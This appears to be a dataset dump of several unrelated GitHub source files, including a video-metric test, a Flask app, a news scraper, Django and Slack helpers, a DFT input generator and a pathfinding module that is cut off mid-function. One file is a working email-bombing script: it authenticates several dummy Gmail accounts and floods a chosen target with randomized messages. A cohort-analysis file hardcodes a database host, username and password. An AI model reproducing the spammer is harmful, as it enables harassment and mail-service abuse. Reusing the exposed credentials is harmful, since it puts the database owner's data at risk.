seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
11845591367 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os, json, subprocess
from tempfile import NamedTemporaryFile
cur_dir = os.path.dirname(os.path.abspath(__file__))
file_path = cur_dir + "/../eval_video.py"
def run_and_check_result(cmd):
cmd_result = subprocess.run(cmd, check=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding="utf8")
data = json.loads(cmd_result.stdout)
assert "video" in data
assert type(data["video"]) == float
assert data["video"] >= 0 and data["video"] <= 100
# check output file
with NamedTemporaryFile('w+t') as output:
cmd.extend(["--output", output.name])
cmd_result = subprocess.run(cmd, check=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding="utf8")
data = json.loads(output.read())
assert "video" in data
assert type(data["video"]) == float
assert data["video"] >= 0 and data["video"] <= 100
def check_video_vmaf(src_video, dst_video):
cmd = ["python3", file_path, "--video_eval_method", "vmaf", "--src_video", src_video, "--dst_video", dst_video]
run_and_check_result(cmd)
def check_yuv_video_vmaf(src_video, dst_video, video_size, pixel_format, bitdepth):
cmd = ["python3", file_path, "--video_eval_method", "vmaf", "--src_video", src_video, "--dst_video", dst_video, \
"--video_size", video_size, "--pixel_format", pixel_format, "--bitdepth", bitdepth]
run_and_check_result(cmd)
def check_align_video_vmaf(src_video, dst_video, align_method):
cmd = ["python3", file_path, "--video_eval_method", "vmaf", "--src_video", src_video, "--dst_video", dst_video]
if align_method:
cmd.extend(["--frame_align_method", align_method])
run_and_check_result(cmd)
def test_y4m_yuv_compare(y4m_video, yuv_video):
src_video = y4m_video["path"]
dst_video = yuv_video["path"]
check_video_vmaf(src_video, dst_video)
check_video_vmaf(dst_video, src_video)
def test_yuv_yuv_compare(yuv_video):
src_video = yuv_video["path"]
dst_video = yuv_video["path"]
video_size, pixel_format, bitdepth = yuv_video["video_size"], yuv_video["pixel_format"], yuv_video["bitdepth"]
check_yuv_video_vmaf(src_video, dst_video, video_size=video_size, pixel_format=pixel_format, bitdepth=bitdepth)
def test_y4m_align_compare(y4m_video, align_method):
src_video = y4m_video["path"]
dst_video = y4m_video["path"]
check_align_video_vmaf(src_video, dst_video, align_method) | OpenNetLab/Challenge-Environment | metrics/tests/test_eval_video.py | test_eval_video.py | py | 2,516 | python | en | code | 8 | github-code | 6 | [
{
"api_name": "os.path.dirname",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "subprocess.run",
"line_... |
13480667519 | import requests, os, json
from flask import Flask, render_template, redirect, url_for, request
from dotenv import load_dotenv
from anvil import Anvil, User
load_dotenv()
app = Flask(__name__)
anvil = Anvil()
user = anvil.load_user()
worlds = anvil.load_worlds(user)
anvil.current_world = worlds[0]
@app.route('/', methods=['POST', 'GET'])
def index():
if request.method == 'POST':
anvil.current_world = anvil.get_world(worlds, request.form["world"])
return render_template('index.html', name=user.name, worlds=worlds, current_world=anvil.current_world)
@app.route('/new_article', methods=['POST', 'GET'])
def new_article():
if request.method == 'POST':
return redirect(url_for("/"))
return render_template('new_article.html', name=user.name, worlds=worlds, current_world=anvil.current_world)
if __name__ == "__main__":
app.run(debug=True) | oaster2000/NPC-Writer | app.py | app.py | py | 898 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask.Flask",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "anvil.Anvil",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "anvil.load_user",
"line_n... |
17915780851 | import smtplib
import re
import sys
import getpass
import random
import math
import time
import os
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.header import Header
import socket
socket.setdefaulttimeout(10)
"""
created by sayansree paria
verson<1.0>
"""
userId=[]
password=[]
print("\n\n\n\temail spammer v1.0\n\tdevlovper sayansree paria\n\tinitiating dummy Ids import.... ")
path=os.path.dirname(os.path.realpath(__file__))
try:
file=open(path+'\\Attribute.dat','r')
lines=file.readlines()
for i in lines:
userId.append(i.split('|')[0])
password.append(i.split('|')[1])
del lines
except FileNotFoundError:
print ("please define attributes.dat")
#raise
sys.exit(0)
except:
print("unexpected fatal error encountered while accessing Attributes\nmake sure code has access permition")
#raise
sys.exit(0)
else:
print ("\tdummy IDs successfully imported")
finally:
file.close()
def check(email):
if not re.match(r"[\w\.-_]+@[\w]+\.com",email):
print('\tinvalid email format')
#raise TypeError('userids not in format')
sys.exit(0)
print('\tprechecking ID format...\n')
if(len(userId)==0):
print('\nno IDs detected\nplease redefine Attribute file')
#raise TypeError('userids not in format')
sys.exit(0)
for i in userId:
check(i)
print(i+'\tvalid')
print('\tprecheck succesful')
print('\n\t{num} dummies will be used '.format(num=len(userId)))
print('\tInitiating authentication process\n\tthis may take several minutes')
module=[]
for i in range(len(userId)):
try:
server =smtplib.SMTP('smtp.gmail.com',587)
except :
print('\ncheck your internet connection')
sys.exit(0)
else:
print('connection established\t\t' + userId[i])
try:
server.starttls()
server.login(userId[i],password[i])
module.append(server)
del server
except smtplib.SMTPConnectError:
print('\nconnection error')
server.quit()
except smtplib.SMTPAuthenticationError:
print('\nauthentication failed'+userId[i]+'*'*5+password[i][-3:])
server.quit()
except:
print('\nunexpected error')
server.quit()
raise
else:
print('succesfully authinticated\t\t'+userId[i])
##needs sighting
target=input('enter target username:\t')
print('\t checking email')
check(target)
print(target+'\tvalid')
itr=input('enter no of attacks:\t')
print('\timporting payload')
payload=[]
try:
file=open(path+'\\payload.txt','r')
lines=file.readlines()
for i in lines:
payload.append(i)
del lines
except FileNotFoundError:
print ("please define payload.txt")
sys.exit(0)
except:
print("unexpected fatal error encountered while accessing payload\nmake sure code has access permition")
sys.exit(0)
else:
print ("\tpayload successfully imported")
finally:
file.close()
tim=3.5*int(itr)
print('\tinitiating payload injection\n\t expected time {0}min,{1}sec'.format(tim%60,tim//60))
sublist=payload[0].split('|')
for i in range(int(itr)):
rand=math.floor(random.random()*len(userId))
msg= MIMEMultipart()
msg['From'] = userId[rand]
msg['To']= target
msg['Subject']= sublist[math.floor(random.random()*len(sublist))]
body= payload[ 1+math.floor(random.random()*(len(payload)-1))]
msg.attach(MIMEText(body,'html'))
module[rand].sendmail(msg['From'],msg['To'],msg.as_string())
del msg
print('payload <{0}> using {1} successful '.format(i+1,userId[rand]))
time.sleep(2+random.random()*3)# some improvement required
print('\t terminating server connections')
for i in module:
i.quit()
print('\t payload successful\n\t devloper sayansree paria\n\t build v<1.0>')
| Sayansree/email_spammer | spammer1.0.py | spammer1.0.py | py | 3,987 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "socket.setdefaulttimeout",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpat... |
12608050279 | # Train model
import sys
import time
import numpy as np
import torch.optim as optim
import pickle
import os
import torch.utils.data
import model as m
import argparse
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--doc_len", type=int, default=300)
parser.add_argument("--lr", type=float, default=0.001)
parser.add_argument("--batchSize", type=int, default=32)
parser.add_argument("--num_workers", type=int, default=4)
parser.add_argument("--flg_cuda", action='store_true')
parser.add_argument("--optType", default='Adam') # Vocabulary size
parser.add_argument("--logInterval", type=int, default=1) # Print test accuracy every n epochs
parser.add_argument("--flgSave", action='store_true')
parser.add_argument("--savePath", default='./')
parser.add_argument("--randSeed", type=int, default=42)
parser.add_argument("--inputPath", default="../aclImdb/df07f20K_stopEng_W_1gram/")
parser.add_argument("--modelPath")
args = parser.parse_args()
torch.manual_seed(args.randSeed) # For reproducible results
if not os.path.isdir(args.savePath):
os.mkdir(args.savePath)
print('General parameters: ', args)
print("Loading Data")
# if args.modelName in ['Enc_SumLSTM', 'Enc_CNN_LSTM']:
#trainset = m.MovieDataset(args.inputPath, 'train.json', transform=m.padToTensor(args.doc_len))
testset = m.MovieDataset(args.inputPath, 'test.json', transform=m.padToTensor(args.doc_len))
print('To Loader')
if args.flg_cuda:
#train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batchSize, shuffle=True, pin_memory=True)
test_loader = torch.utils.data.DataLoader(testset, batch_size=args.batchSize, shuffle=False, pin_memory=True)
else:
#train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batchSize, shuffle=True, pin_memory=False)
test_loader = torch.utils.data.DataLoader(testset, batch_size=args.batchSize, shuffle=False, pin_memory=False)
print("Loading model")
if args.flg_cuda:
model = torch.load(args.modelPath + '_model.pt')
model = model.cuda()
else:
model = torch.load(args.modelPath + '_model.pt', map_location=lambda storage, loc: storage)
print(model)
if args.optType == 'Adam':
opt = optim.Adam(model.params, lr=args.lr)
elif args.optType == 'SGD':
opt = optim.SGD(model.params, lr=args.lr)
print("Beginning Training")
train_paras = {'log_interval': [args.logInterval, 1000], 'flg_cuda': args.flg_cuda,
'flgSave': args.flgSave, 'savePath': args.savePath}
m = m.trainModel(train_paras, None, test_loader, model, opt)
m._test(0)
| jingsliu/NLP_HW | HW1/code/eval.py | eval.py | py | 2,761 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "torch.optim.manual_seed",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "os.path.i... |
22291138485 | import re
import requests
from bs4 import BeautifulSoup
def scrape_page_title(soup):
""" Function to extract the title of an article from the scrapped code """
title = soup.find('h1', class_='content__headline').get_text()
title = re.sub('\n', '', title)
return title
def scrape_page_topic(soup):
""" Function to extract the topic name of an article from the scrapped code """
try:
label = soup.find('span', class_='label__link-wrapper').get_text()
except AttributeError:
return "-"
label = re.sub('\n', '', label)
return label
def scrape_page_authors(soup):
""" Function to extract the names of authors of an article from the scrapped code """
authors = [re.sub('\n', '', a.get_text()) for a in soup.find_all('span', itemprop="name")]
authors = ' & '.join([str(a) for a in authors])
return authors
def scrape_page_datetime(soup):
""" Function to extract the date of publication of an article from the scrapped code """
datetime = [re.sub('\n', '', d.get_text()) for d in soup.find_all('time', itemprop="datePublished")]
datetime = re.sub('\xa0', ' ', datetime[0])
return datetime
def scrape_page_description(soup):
""" Function to extract the description of the article from the scrapped code """
try:
descr = soup.find('div', class_="content__standfirst").get_text()
descr = re.sub('\n', '', descr)
except AttributeError:
return "-"
return descr
def scrape_page_text(soup):
""" Function to extract the text of the article from the scrapped code """
text = soup.find('div', class_="content__article-body")
text = [t.get_text() for t in text.find_all('p')]
text = ' '.join(t for t in text)
return text
def scrape_page_related_topics(soup):
""" Function to extract the links of the related topics of a given article from the scrapped code """
links = [a['href'] for a in soup.find_all('a', class_='submeta__link')]
return links
def scrape_page(link):
""" Function returns the different information extracted from the page of an article"""
page = requests.get(link)
soup = BeautifulSoup(page.content, 'html.parser')
title = scrape_page_title(soup)
link = link
topic = scrape_page_topic(soup)
related_topics_links = scrape_page_related_topics(soup)
authors = scrape_page_authors(soup)
datetime = scrape_page_datetime(soup)
description = scrape_page_description(soup)
text = scrape_page_text(soup)
return title, link, topic, related_topics_links, authors, datetime, description, text
def home_page(link):
""" Function returns the links to other articles from a given topic page """
next_pages = []
page = requests.get(link)
soup = BeautifulSoup(page.content, 'html.parser')
for n in soup.find_all('a', class_='fc-item__link'):
if n['href'] not in next_pages:
next_pages.append(n['href'])
return next_pages
| mcmxlix/the_guardian_crawler | Crawler/scrape_infos.py | scrape_infos.py | py | 2,969 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "re.sub",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 32,
"usage_type":... |
5131582706 | from django.contrib.auth.models import AbstractUser
from django.db import models
class User(AbstractUser):
ADMIN = 'admin'
MODERATOR = 'moderator'
USER = 'user'
USER_ROLE_CHOICES = [
(ADMIN, 'admin'),
(MODERATOR, 'moderator'),
(USER, 'user'),
]
confirmation_code = models.CharField(
max_length=100,
blank=True
)
username = models.CharField(
max_length=150,
unique=True,
db_index=True
)
email = models.EmailField(
verbose_name='Email',
help_text='Введите адрес эл.почты',
unique=True
)
bio = models.TextField(
verbose_name='О пользователе',
help_text='Расскажите о себе',
blank=True,
null=True
)
role = models.CharField(
'Роль пользователя',
max_length=20,
choices=USER_ROLE_CHOICES,
default=USER,
blank=True,
)
@property
def is_user(self):
return self.role == self.USER
@property
def is_moderator(self):
return self.role == self.MODERATOR
@property
def is_admin(self):
return self.role == self.ADMIN or self.is_staff
class Meta:
verbose_name = 'Пользователь'
verbose_name_plural = 'Пользователи'
def __str__(self):
return self.name
| Toksi86/yamdb_final | api_yamdb/users/models.py | models.py | py | 1,428 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.contrib.auth.models.AbstractUser",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "django.db.models.CharField",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "django.db.models",
"line_number": 15,
"usage_type": "name"
},
{
... |
20477618446 | from typing import List, Optional, Union
def _make_mrkdown_block(mrkdown: str):
"""
Wraps the mrkdown in a block kit block.
"""
return {
"type": "section",
"text": {
"type": "mrkdwn",
"text": mrkdown,
},
}
def _make_header_block(heading: str):
"""
Wraps the heading in a block kit block.
"""
return {
"type": "header",
"text": {
"type": "plain_text",
"text": heading,
},
}
def _make_block_message(
blocks: Union[None, str, dict, List[Union[str, dict]]],
header: Optional[str] = None,
visible_in_channel: bool = True,
):
"""
Generates slack block kit messages from a variety of input types.
str -> Wrap the str in a mrkdown section and in a top level response.
dict -> Wrap the dict in a top level response.
list -> Wrap the altered contents in a top level response.
str -> Wrap the str in a mrkdown section
dict -> add to top level response as is
"""
output_blocks: List[dict] = []
if blocks is None or blocks == "":
return {}
if isinstance(blocks, dict):
output_blocks = [blocks]
elif isinstance(blocks, list):
formatted_blocks = []
for block in blocks:
if isinstance(block, str):
formatted_blocks.append(_make_mrkdown_block(block))
if isinstance(block, dict):
formatted_blocks.append(block)
output_blocks = formatted_blocks
else:
output_blocks = [_make_mrkdown_block(str(blocks))]
if header:
output_blocks = [_make_header_block(header)] + output_blocks
return {
"blocks": output_blocks,
"response_type": "in_channel" if visible_in_channel else "ephemeral",
}
| henryivesjones/slash-slack | slash_slack/blocks.py | blocks.py | py | 1,823 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "typing.Union",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_numb... |
28237496421 | #!/usr/bin/python
from copy import deepcopy
from fodft_tools import *
import argparse
import os
import sys, traceback
from ase import Atoms
spec_path = "/data/schober/code/fhiaims_develop/fhiaims_supporting_work/species_defaults/"
aims_params = {
"xc" : "blyp",
"spin" : "collinear",
"occupation_type" : "gaussian 0.01",
"mixer" : "pulay",
"n_max_pulay" : "10",
"charge_mix_param" : "0.5",
"sc_accuracy_rho" : "1E-4",
"sc_accuracy_eev" : "1E-2",
"sc_accuracy_etot" : "1E-6",
"relativistic" : "none",
"species_dir" : "",
#"species_dir" : os.path.join(self.spec_path, self.avail_species[self.species])
}
# global parameters
#spec_path = "/data/schober/code/fhiaims_develop/fhiaims_supporting_work/species_defaults/"
avail_species = {"light" : "light",
"tight" : "tight",
"cc.3" : "non-standard/NAO-VCC-nZ/NAO-VCC-3Z",
"cc.4" : "non-standard/NAO-VCC-nZ/NAO-VCC-4Z",
"cc.5" : "non-standard/NAO-VCC-nZ/NAO-VCC-5Z",
"tight.ext" : "tight.ext",
"cc.3.ext" : "non-standard/NAO-VCC-nZ/NAO-VCC-3Z.ext"
}
parser = argparse.ArgumentParser(description="Get parameters for fodft")
parser.add_argument('filename', nargs='+', help='Geometry file with the dimer or a list(blob)')#, dest='filename')
parser.add_argument('-e, --extension', help='Format of the geometry file, if not .xyz', dest='fformat', metavar='FORMAT', default='xyz')
parser.add_argument('-d, --dir', help='-d = subfoldername, will create project files there', dest='dir', default='./')
parser.add_argument('-f, --full', help='Create inputs for basic and polarized fodft', dest='full', action="store_true")
parser.add_argument('-c, --cubes', help="Automatically adds cube output command for guessed states", dest="cubes", action="store_true")
parser.add_argument('-a, --automagic', help="Tries to find fragments by a clustering algorithm. Check the result carefully! See also:--cutoff", dest="magic", action="store_true")
parser.add_argument('--cutoff', help="Optional: Defines the cutoff for the clustering algorithm. Works best with values larger than inter-molecular distances and smaller than inter-molecular distances! Default is 1.7 for C-C-bonds!", dest="cutoff", type=float)
parser.add_argument('-o, --orbitals', help="FO-Orbitals for determination of matrix elements (form: state1 state2 range1 range2)", dest="orbitals", nargs='+', type=int)
parser.add_argument('-i, --image', help="If more than one geometry in .xyz (e.g. a trajectory), which image to choose? Default: Last structure", type=int, dest="image", default=0)
# additional, optinal arguments for the fodft-class
#parser.add_argument('-
arguments = parser.parse_args()
filename = arguments.filename
fformat = arguments.fformat
#if len(filename) > 1 and arguments.dir:
#print("Using one folder and more than one input doesn't work! Bye!")
#sys.exit()
#example = fo_aims(Atoms('CO', positions=[(0, 0, 0), (0, 0, 1)]), arguments.image-1)
#example.avail_species = avail_species
arg_dict = {
"xc" : ["Which XC functional (Default: blyp): ", "blyp"],
"charge_in" : ["Charges on [frag1], [frag2] (Default: +1 0]): ", "+1 0"],
"embedding" : ["Use embedding? [y/n] (Default: no): ", ".false."],
"species" : ["Specify basis set, available options: \n\n {0} \n\n(Default: tight). Please choose: ".format(avail_species.keys()), "tight"],
"fo_type" : ["FO_Type, hole or elec (Default: hole): ", "hole"],
}
# get params for fodft
arg_dict_values = deepcopy(arg_dict)
# First, get user input
for item in arg_dict:
arg_dict_values[item][1] = raw_input("{0}".format(arg_dict[item][0]))
# Fill up with defaults were no user input exists
for item in arg_dict_values:
if arg_dict_values[item][1] is "":
arg_dict_values[item][1] = arg_dict[item][1]
# Special post processing of inputs
if arg_dict_values['embedding'][1] == "y":
arg_dict_values['embedding'][1] = ".true."
elif arg_dict_values['embedding'][1] == "n":
arg_dict_values['embedding'][1] = ".false."
for file in filename:
system = fo_aims(file, arguments.image-1, fformat)
system.spec_path = spec_path
system.avail_species = avail_species
system.aims_params = aims_params
system.aims_params["species_dir"] = os.path.join(system.spec_path, system.avail_species[arg_dict_values["species"][1]])
if len(filename) > 1:
dirname = file.rpartition(".")[0]
if dirname == filename:
dirname = "fo" + dirname
arguments.dir = dirname
if arguments.dir == "./":
print("Creating files in current working directory ({0})".format(os.getcwd()))
else:
try:
cwd_start = os.getcwd()
os.mkdir(arguments.dir)
os.chdir(arguments.dir)
print("Creating files in {0}!".format(arguments.dir))
except:
print("Error when creating folder {0}:".format(arguments.dir))
raise
print("Creating basic and embedded input: {0}".format(arguments.full))
# Set the values.
system.aims_params['xc'] = arg_dict_values['xc'][1]
system.charge_in = arg_dict_values['charge_in'][1].strip("[]").split()
system.embedding = arg_dict_values['embedding'][1]
system.species = arg_dict_values['species'][1]
system.fo_type = arg_dict_values['fo_type'][1]
print("Got all information, now create the fragments!")
if arguments.magic:
if arguments.cutoff:
system.magic_cutoff = arguments.cutoff
system.magic_fragmentation()
else:
system.create_fragments()
if arguments.orbitals:
system.frontiers = arguments.orbitals[0:2]
system.fo_range = arguments.orbitals[2:4]
system.update_calculators()
if arguments.cubes is True:
system.set_cube_files()
if arguments.full is True:
print("Now creating input files for basic fo_dft...")
os.mkdir("basic")
os.mkdir("embedded")
cwd = os.getcwd()
os.chdir("basic")
#print("Now creating the input files!")
system.write_inputs()
os.chdir(cwd)
os.chdir("embedded")
print("Now creating input files for embedded fo_dft...")
system.embedding = ".true."
system.update_calculators()
system.set_cube_files()
system.write_inputs()
else:
print("Now creating the input files!")
system.write_inputs()
print("Done.")
try:
os.chdir(cwd_start)
except:
pass
| schober-ch/fodft_tools | fodft.py | fodft.py | py | 6,769 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "os.path",
"lin... |
33280054752 | # %%
import numpy as np
import pandas as pd
import datetime as dt
#from cohorts_pipeline_woof_v4 import df_cleaning
#from cohorts_pipeline_woof_v4 import cohorts_pipeline
import mysql.connector
from mysql.connector import Error
# %%
#df_og = pd.read_csv('./Data/orders.csv', sep=';', decimal=',')
query_orders = 'SELECT alo.Customer_ID, alo.Hashed_Email, alo.Conv_Date, alo.Conv_ID, CASE WHEN alo.Conv_Date = first_orders.first_date THEN "New" ELSE "Returning" END AS "Customer_Type", alo.Revenue, alo.Revenue_excl_VAT FROM api_shopware.api_shopware_orders alo JOIN ( SELECT Hashed_Email, MIN(Conv_Date) AS "first_date" FROM api_shopware.api_shopware_orders alo WHERE Account = "WOOOF" AND Conv_Status != "cancelled" GROUP BY 1) AS first_orders ON first_orders.Hashed_Email = alo.Hashed_Email WHERE Account = "WOOOF" AND Conv_Status != "cancelled" AND Shipping_Country = "Germany"'
#%%
try:
connection = mysql.connector.connect(host='attribution-system-fsg-new.cob86lv75rzo.eu-west-1.rds.amazonaws.com',
database='api_lightspeed',
user='fsg',
password='Attribution3.0')
if connection.is_connected():
db_Info = connection.get_server_info()
print("Connected to MySQL Server version ", db_Info)
cursor = connection.cursor()
cursor.execute("select database();")
record = cursor.fetchone()
print("Your connected to database: ", record)
df_og = pd.read_sql(query_orders,con=connection)
except Error as e:
print("Error while connecting to MySQL", e)
finally:
if (connection.is_connected()):
cursor.close()
connection.close()
print("MySQL connection is closed")
#%%
#df_og.columns
df_og.head()
#%%
df_og.Conv_Date.max()
#%%
df = df_og.copy()
#%%
df.set_index('Customer_ID', inplace=True)
df['First_Order'] = df.groupby(level=0)['Conv_Date'].min()
df['First_Order_YM'] = df.groupby(level=0)['Conv_Date'].min().apply(lambda x: x.strftime('%Y-%m'))
df.reset_index(inplace=True)
df['Creation_Date_YM'] = df['Conv_Date'].apply(lambda x: x.strftime('%Y-%m'))
#%%
df['Year'] = df['Conv_Date'].dt.year
df['Week'] = df['Conv_Date'].dt.week
df['Year_Week'] = df['Conv_Date'].dt.strftime("%Y-%W")
#%%
df.head()
#%%
months = df['First_Order_YM'].unique()
output_dfs = {p: df[df['First_Order_YM'] == p] for p in months}
cohort_orders = pd.DataFrame()
cohort_customers = pd.DataFrame()
cohort_values = pd.DataFrame()
trans_summary = pd.DataFrame()
projections = pd.DataFrame()
rev_summary = pd.DataFrame()
rev_summary['New'] = df[df['Customer_Type']=='New'].groupby('Creation_Date_YM')['ValueNOVAT'].sum()
rev_summary['Returning'] = df[df['Customer_Type']=='Returning'].groupby('Creation_Date_YM')['ValueNOVAT'].sum()
#%%
from cohorts_pipeline_woof_v4 import df_cleaning
from cohorts_pipeline_woof_v4 import cohorts_pipeline
# %%
df = df_cleaning(df_og)
# %%
df.head()
# %%
transactions, reorder_rates = cohorts_pipeline(df)
#%%
transactions = transactions.fillna(0)
transactions.head()
# %%
transactions = transactions.astype(int)
# %%
reorder_rates = reorder_rates.astype(str)
# %%
reorder_rates = reorder_rates.apply(lambda x: x.str.replace('.',','))
reorder_rates = reorder_rates.apply(lambda x: x.str.replace('nan',''))
# %%
from gspread_pandas import Spread, Client
# %%
wooof_cohorts_data_dump = Spread('WOOOF_COHORTS_DUMP')
# %%
# Push Transactions
wooof_cohorts_data_dump.df_to_sheet(transactions, index=True, sheet='TRANSACTIONS_JULY', start='A1', replace=True)
wooof_cohorts_data_dump.df_to_sheet(reorder_rates, index=True, sheet='REORDER_RATES_JULY', start='A1', replace=True)
# %%
transactions
# %%
| rahichan/angela_legacy | WOOOF/WOOOF_COHORTS_BUILDER.py | WOOOF_COHORTS_BUILDER.py | py | 3,732 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "mysql.connector.connector.connect",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "mysql.connector.connector",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "mysql.connector",
"line_number": 15,
"usage_type": "name"
},
{
"... |
37975869389 | '''
Get completed data as Dataframe for charts
Calls to MongoDB for data
Test data is a separate module
'''
from datetime import datetime
session = {'defaults':{'trial':{"id":123, 'start_date':datetime.now().timestamp-(30*24*60*60)}}}
from test_data import get_test_data
from chart_frame import three_column_frame
test_struct={'group':{'name':'Trial_Id', 'label':'Trial_Id'},
'x_col':{'name':'trial_day', 'label':'Day'},
'y_col':{'name':'temp', 'label':'Temperature'}}
def test_chart_data():
# generate data frame for test_chart
json = get_test_data()
data = three_column_frame(json, test_struct)
return data
def env_data(trial_id, attribute):
# environmental data for an individual trial
start_date = session["defaults"]['trial']["start_date"]
end_date = datetime.now().timestamp()
print("env_data", attribute, start_time, end_time)
match = {"$match":{
"trial.id":trial_id,
"status.status_qualifier":SUCCESS,
"subject.attribute.name": attribute,
"$and":[{"time.timestamp":{"$gt":start_time}},
{"time.timestamp":{"$lt":end_time}}]
}}
sort = {"$sort":{"time.timestamp":1}}
query = [match, sort]
mu = MongoUtil(DB)
recs = mu.aggregate(DB, OB_COL, query)
test_struct={'group':{'name':'Trial_Id', 'label':'Trial_Id'},
'x_col':{'name':'trial_day', 'label':'Day'},
'y_col':{'name':attribute, 'label':'Temperature'}}
return three_column_frame(recs, test_struct)
ts = []
value = []
for doc in recs:
#print(start_time, doc[TIME][TIMESTAMP], end_time)
ts.append(doc["time"][TIME_STR])
value.append(doc[SUBJECT][ATTRIBUTE][VALUE])
return DataFrame({TIME:ts, attribute:value})
def test():
print("Test of test chart data")
f = test_chart_data()
print(f)
if __name__ == '__main__':
test()
| webbhm/MARSFarm-web_VX | gbet_charts/functions/hold/chart_data.py | chart_data.py | py | 1,935 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "datetime.datetime.now",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "test_data.get_test_data",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "chart_f... |
20420593181 | from confluent_kafka.admin import AdminClient, NewTopic
topic = 'Kafka_Image_Processing'
client_id = "admin_hagar"
conf = {'bootstrap.servers': "34.70.120.136:9094,35.202.98.23:9094,34.133.105.230:9094",
'client.id': client_id}
ac = AdminClient(conf)
res = ac.create_topics([NewTopic(topic, num_partitions=3, replication_factor=2)])
res[topic].result() | HagarIbrahiem/Kafka_ImgProcessing | admin.py | admin.py | py | 373 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "confluent_kafka.admin.AdminClient",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "confluent_kafka.admin.NewTopic",
"line_number": 10,
"usage_type": "call"
}
] |
7153685231 | # solarmap.py
import collections
import heapq
class SolarSystem:
"""
Solar system handler
"""
def __init__(self, key):
self.id = key
self.connected_to = {}
def add_neighbor(self, neighbor, weight):
self.connected_to[neighbor] = weight
def get_connections(self):
return self.connected_to.keys()
def get_id(self):
return self.id
def get_weight(self, neighbor):
return self.connected_to[neighbor]
class SolarMap:
"""
Solar map handler
"""
GATE = 0
WORMHOLE = 1
def __init__(self, eve_db):
self.eve_db = eve_db
self.systems_list = {}
self.total_systems = 0
def add_system(self, key):
self.total_systems += 1
new_system = SolarSystem(key)
self.systems_list[key] = new_system
return new_system
def get_system(self, key):
if key in self.systems_list:
return self.systems_list[key]
else:
return None
def get_all_systems(self):
return self.systems_list.keys()
def add_connection(
self,
source,
destination,
con_type,
con_info=None,
):
if source not in self.systems_list:
self.add_system(source)
if destination not in self.systems_list:
self.add_system(destination)
if con_type == SolarMap.GATE:
self.systems_list[source].add_neighbor(self.systems_list[destination], [SolarMap.GATE, None])
self.systems_list[destination].add_neighbor(self.systems_list[source], [SolarMap.GATE, None])
elif con_type == SolarMap.WORMHOLE:
[sig_source, code_source, sig_dest, code_dest, wh_size, wh_life, wh_mass, time_elapsed] = con_info
self.systems_list[source].add_neighbor(
self.systems_list[destination],
[SolarMap.WORMHOLE, [sig_source, code_source, wh_size, wh_life, wh_mass, time_elapsed]]
)
self.systems_list[destination].add_neighbor(
self.systems_list[source],
[SolarMap.WORMHOLE, [sig_dest, code_dest, wh_size, wh_life, wh_mass, time_elapsed]]
)
else:
# you shouldn't be here
pass
def __contains__(self, item):
return item in self.systems_list
def __iter__(self):
return iter(self.systems_list.values())
def shortest_path(
self,
source,
destination,
avoidance_list,
size_restriction,
ignore_eol,
ignore_masscrit,
age_threshold
):
path = []
size_restriction = set(size_restriction)
if source in self.systems_list and destination in self.systems_list:
if source == destination:
path = [source]
else:
queue = collections.deque()
visited = set([self.get_system(x) for x in avoidance_list])
parent = {}
# starting point
root = self.get_system(source)
queue.append(root)
visited.add(root)
while len(queue) > 0:
current_sys = queue.popleft()
if current_sys.get_id() == destination:
# Found!
path.append(destination)
while True:
parent_id = parent[current_sys].get_id()
path.append(parent_id)
if parent_id != source:
current_sys = parent[current_sys]
else:
path.reverse()
return path
else:
# Keep searching
for neighbor in [x for x in current_sys.get_connections() if x not in visited]:
# Connection check (gate or wormhole size)
[con_type, con_info] = current_sys.get_weight(neighbor)
if con_type == SolarMap.GATE:
proceed = True
